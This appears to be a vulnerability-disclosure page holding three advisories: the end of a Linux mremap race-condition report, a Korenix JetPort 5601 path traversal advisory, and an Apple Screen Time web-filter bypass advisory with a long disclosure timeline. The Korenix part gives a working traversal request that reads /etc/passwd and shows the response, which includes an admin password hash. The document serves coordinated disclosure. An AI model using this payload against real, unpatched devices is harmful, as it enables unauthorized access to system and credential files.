move_page_tables() in the reverse direction to move PTEs back.    move_page_tables() unexpectedly needs to allocate a new page table to move the PTEs generated by the huge PMD split, which again fails. PTEs are left behind in the destination area.    do_vmi_munmap() removes the temporary destination VMA and removes the left-behind PTEs in the destination area.So in the end, an anonymous page has erroneously disappeared from the VMA, but I think that doesn't lead to any major consequences.FWIW, the architectures that define HAVE_ARCH_TRANSPARENT_HUGEPAGE without also defining HAVE_MOVE_PMD are: mips, loongarch, s390, sparc64, arc, arm.I think similar things can probably also happen on x86/arm64 if, when moving PTEs back with move_pgt_entry(HPAGE_PMD, ...), we race with a concurrent split_huge_page_to_list_to_order() such that move_huge_pmd() fails at the __pmd_trans_huge_lock() and we fall back to the move_ptes() path.CommentsAll commentsja...@google.com <ja...@google.com> #2Oct 15, 2024 11:05AMThe fix for the security bug is currently in the MM tree at https://git.kernel.org/pub/scm/linux/kernel/git/akpm/mm.git/commit/?id=9118e3ff1212add463770537519dce4aed51cf94 , on the mm-hotfixes-unstable branch.ja...@google.com <ja...@google.com> #3Oct 22, 2024 09:28AMMarked as fixed, reassigned to ja...@google.com.Fix landed as https://git.kernel.org/linus/6fa1066fc5d00cb9f1b0e83b7ff6ef98d26ba2aa ("mm/mremap: fix move_normal_pmd/retract_page_tables race").In stable releases:    6.6.58 (2024-10-22)    6.11.5 (2024-10-22)Related CVE Number: CVE-2024-50066.Credit: Jann Horn

Linux 6.6 Race Condition

Korenix JetPort 5601 version 1.2 suffers from a path traversal vulnerability.

    St. Pölten UAS 20241118-1-------------------------------------------------------------------------------                title| Path Traversal              product| Korenix JetPort 5601   vulnerable version| 1.2        fixed version| -           CVE number| CVE-2024-11303               impact| High             homepage| https://www.korenix.com/                found| 2024-05-24                   by| P. Oberndorfer, B. Tösch, M. Narbeshuber-Spletzer,                     | C. Hierzer, M. Pammer                     | These vulnerabilities were discovery during research at                     | St.Pölten UAS, supported and coordinated by CyberDanube.                     |                     | https://fhstp.ac.at | https://cyberdanube.com-------------------------------------------------------------------------------Vendor description-------------------------------------------------------------------------------"Korenix Technology, a Beijer group company within the Industrial Communicationbusiness area, is a global leading manufacturer providing innovative, market-oriented, value-focused Industrial Wired and Wireless Networking Solutions.With decades of experiences in the industry, we have developed various productlines [...].Our products are mainly applied in SMART industries: Surveillance, Machine-to-Machine, Automation, Remote Monitoring, and Transportation. Worldwide customerbase covers different Sales channels, including end-customers, OEMs, systemintegrators, and brand label partners. [...]"Source: https://www.korenix.com/en/about/index.aspx?kind=3Vulnerable versions-------------------------------------------------------------------------------Korenix JetPort 5601v3 / v1.2Vulnerability overview-------------------------------------------------------------------------------1) Path Traversal (CVE-2024-11303)A path traversal attack for unauthenticated users is possible. This allowsgetting access to the operating system of the device and access informationlike configuration files and connections to other hosts or potentially othersensitive information.Proof of Concept-------------------------------------------------------------------------------1) Path Traversal (CVE-2024-11303)By sending the following request to the following endpoint, a path traversalvulnerability can be triggered:-------------------------------------------------------------------------------GET /%2e%2e/%2e%2e/etc/passwd HTTP/1.1Host: 10.69.10.2Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Te: trailersConnection: keep-alive-------------------------------------------------------------------------------Note, that this is only possible when an interceptor proxy or a command linetool is used. A web browser would encode the characters and the path traversalwould not work.The response to the latter request is shown below:-------------------------------------------------------------------------------HTTP/1.1 200 OKServer: thttpd/2.19-MX Jun  2 2022Content-type: text/plain; charset=iso-8859-1[...]Accept-Ranges: bytesConnection: Keep-AliveContent-length: 86root::0:0:root:/root:/bin/falseadmin:$1$$CoERg7ynjYLsj2j4glJ34.:502:502::/:/bin/true-------------------------------------------------------------------------------The vulnerabilities were manually verified on an emulated device by using theMEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).Solution-------------------------------------------------------------------------------None. Device is End-of-Life.Workaround-------------------------------------------------------------------------------Limit the access to the device and place it within a segmented network.Recommendation-------------------------------------------------------------------------------CyberDanube recommends Korenix customers to upgrade to another device.Contact Timeline-------------------------------------------------------------------------------2024-09-23: Contacting Beijer Electronics Group via cs@beijerelectronics.com.2024-09-24: Vendor stated, that the device is end-of-life. Contact will ask the            engineering team if there are any changes.2024-10-15: Vendor stated, that the advisory can be published. No further            updates are planned for this device.2024-11-18: Coordinated disclosure of advisory.Web: https://www.fhstp.ac.at/Twitter: https://x.com/fh_stpoeltenMail: mis@fhstp.ac.atEOF T. Weber / @2024

Korenix JetPort 5601 1.2 Path Traversal

Nosebeard Labs has identified a critical vulnerability in the Apple system wide web content filter that allows a full bypass of content restrictions. This vulnerability, which occurs specifically when Screen Time content filtering settings are enabled, permits users or attackers to access restricted websites in Safari without detection. The timeline in this advisory is probably the most interesting thing to note. It shows a Fortune 10 ignoring a concern for years until a news article gets written, and that is truly disappointing. Do better Tim.

    Dear colleagues,Nosebeard Labs is pleased to share its latest advisory, detailing a bypass of Apple's system wide web content filter. The HTML version of this advisory is also available at:https://nosebeard.co/advisories/nbl-001.htmlWarmest regards,Nosebeard Labs## SummaryNosebeard Labs Security Advisory NBL-001Title: Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionOS/watchOS)Advisory ID: NBL-001Date: 2024-11-15Severity: Critical (CVSS 9.1)Affected Product: Safari on any Apple device with Screen Time enabledCVE ID: CVE-2024-44206## OverviewNosebeard Labs has identified a critical vulnerability in Apple’s system wide web content filter that allows a full bypass of content restrictions. This vulnerability, which occurs specifically when Screen Time’s content filtering settings are enabled, permits users or attackers to access restricted websites in Safari without detection. By exploiting a misalignment between Screen Time’s Access Control List (ACL) and WebKit’s URI validation, a specially crafted URI can circumvent both layers of protection.Apple has assigned CVE-2024-44206 to this issue and issued a fix for macOS Sonoma 14.x, iOS/iPadOS 17.x, watchOS 10.x, visionOS 1.x, Safari 17.x and up.However, a fix is still pending for the backport channels.## DescriptionThis vulnerability arises when the WebKit Cocoa layer in Safari ingests a URI without performing comprehensive validation, combined with a failure by the Screen Time ACL filter to recognize and block the malformed URI. The flaw allows a crafted URI to bypass all Screen Time content filtering settings, including deny/allow lists and parental content filters, providing unrestricted access to blocked content.## Affected SystemsThis vulnerability affects all devices on macOS, iOS, iPadOS, watchOS and visionOS platforms with Safari and Screen Time enabled, impacting an estimated 250 million devices globally.## Attack ScenariosThe vulnerability can be exploited both locally and remotely:1. Local Exploitation: Users can manipulate the address bar to manually enter a crafted URI, bypassing Screen Time restrictions.2. Network-Based Exploitation: Attackers can load restricted content remotely by embedding a crafted URI within an iframe, bypassing restrictions without requiring user interaction.## Impact1. Confidentiality: Unrestricted access to restricted websites compromises the confidentiality of content filtering controls, potentially exposing sensitive or inappropriate material.2. Scope and Integrity: This vulnerability spans across two separate security mechanisms (Screen Time and WebKit), representing a critical architecture-level issue. Additionally, accessing unsecured or unlogged resources poses potential integrity risks.## CVSS ScoreVector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:NScore: 9.1 (Critical)## MitigationsUpgrade to the latest iOS/iPadOS 17.x or 18.x / macOS Sonoma 14.x  / visionOS 1.x / watchOS 10.x / Safari 17.6 respectively. Users who are unable to apply a fix can contact us for more info.## Vendor ResponseApple has issued CVE-2024-44206 and supplied a fix within WebKit; however, a fix remains pending for iOS/iPadOS version 16.x. We recommend that Apple undertake further review to address the issue comprehensively.## Timeline–Milestone:2020-11-24 Vulnerability discovered internally at NBL–Milestone:2021-03-08 Initial disclosure to Apple Product Security–2021-03-09 Apple Product Security recommends to open a bug report on Feedback Assistant2021-03-10 We opened a bug report on Feedback Assistant as advised by Apple Product Security2021-03-15 We follow-up by adding additional info to the open bug report on F.A.2021-08-16 We follow-up again referring Apple Product Security to open ticket, stressing that the issue can be also demonstrated in their EU Apple Stores2021-08-24 We follow-up again to Apple Product Security, referring to the previous follow-up2021-08-25 Rejected by Apple Security - “We do not see any actual security implications. We recommended reporting this issue via Feedback Assistant”2024-03-18 NBL submits a second report 3 years later to appeal via Apple Security Bounty Program, urging to re-evaluate, also providing PoC code2024-03-19 Apple Security Research closes report - “We’re unable to identify a security issue in your report” - “Screen Time is not intended to protect a device against manipulation” - “We recommend reporting this via Feedback Assistant”2024-04-02 Status of Bug Report on F.A. from 2021-03-10 “Open, Similar Reports None”2024-04-03 We follow-up again asking Apple Security for a final reassessment, providing a temporary workaround2024-04-03 Apple Security recommends opening a bug report - “ST is not intended to protect a device against manipulation” - “MDM profiles provide configuration management but do not establish additional security boundaries beyond what iOS and iPadOS have to offer.”2024-05-05 Initial contact with Joanna Stern of WSJ2024-05-06 Referring PSIRT ticket # directly to an Apple PSIRT contact via undisclosed SOC - no response2024-05-28 Joanna Stern/WSJ runs Apple through this2024-05-29 Apple commits patches to Safari branch–Milestone:2024-06-05 Wall Street Journal addresses our finding in their article “A Bug Allowed Kids to Visit X-Rated Sites. Apple Took Three Years to Fix It.” by Joanna Stern–2024-06-18 We follow-up again with Urgent request for re-evaluation to Apple Product Security (“Addendum”)2024-06-27 We follow-up on our follow-up Update Request Screen Time Security Vulnerability Report (“Follow-Up”)2024-07-23 Apple releases fix in iOS 17.6RC et al.2024-07-26 Letter to Apple welcoming first fix, reiterating our dedication to Responsible Disclosure, intended to coordinate further disclosure process and close the affair asking them to give credit and align to their SBP–Milestone:2024-07-29 Apple releases fixes for macOS Sonoma 14.6, iOS/iPadOS 17.6, watchOS 10.6, visionOS 1.3 and Safari 17.6, leaving iOS/iPadOS 16.x still affected.–2024-07-31 Apple responds “ST is not intended to protect a device from malicious manipulation, and bug reports on features like this are therefore typically ineligible for credit or Apple Security Bounty award. However, we’d like to make an exception and award you USD (...)* as a thank you for your report. Also, we’d like to credit you on our security advisory under the ‘Additional recognition’ section of the page.” *We were offered the minimum possible amount.2024-08-01 We inquire about the bounty amount asking Apple to “comment on our proposed evaluation under the CVSS metrics, sharing with us their transparent assessment of the vulnerability under the terms and broad criteria of the bounty program.”2024-08-01 Apple “appreciates our suggestions, but CVSS scores are not something that they publish to their security advisory.”2024-08-03 Patches merged with public WebKit branch2024-08-19 We are reaching out to Apple again “Ringing the escalation bell for the SBP team”2024-08-23 Apple Product Security advises a call2024-09-10 Apple Security rejects adjustment of the bounty as “out of scope/edge case policy” in the call, offering a $20,000 charity donation instead We request Apple to assign a CVE.–Milestone:2024-10-17 Apple follows-up with CVE-2024-44206 and an update to the advisorieshttps://support.apple.com/en-us/120909https://support.apple.com/en-us/120911https://support.apple.com/en-us/120913https://support.apple.com/en-us/120915https://support.apple.com/en-us/120916–2024-10-23 We follow-up one more time to request a further review of the severity and reward2024-11-02 NBL-001 advisory draft shared with Apple2024-11-14 Apple requests naming their charity offer among bounty payout details, leaving out further comments on the contents of the advisory itself.2024-11-15 NBL-001 published## ContactFor more information, please contact Andreas Jaegersberger or Ro Achterberg from Nosebeard Labs at labs@nosebeard.co.## Special ThanksMuch love goes out to Joanna Stern for her incredible support in making this happen.We also want to thank Aaron Kaplan for the tailwind throughout the journey and Arnoud Engelfriet for the rapid legal advice.Buongiorno to the cap’n <3

Tag

#mac